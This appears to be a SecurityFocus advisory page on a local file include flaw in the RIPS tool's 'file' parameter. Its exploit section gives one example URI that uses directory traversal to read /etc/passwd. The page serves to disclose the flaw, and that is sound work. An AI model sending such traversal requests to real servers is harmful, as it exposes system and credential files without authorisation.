info
discussion
exploit
solution
references
RIPS 'file' Parameter Local File Include Vulnerability
An attacker can exploit the issue with a browser
The following example URI is available:
http://www.example.com/rips/windows/code.php?file=../../../../../../etc/passwd
Privacy Statement
Copyright 2010, SecurityFocus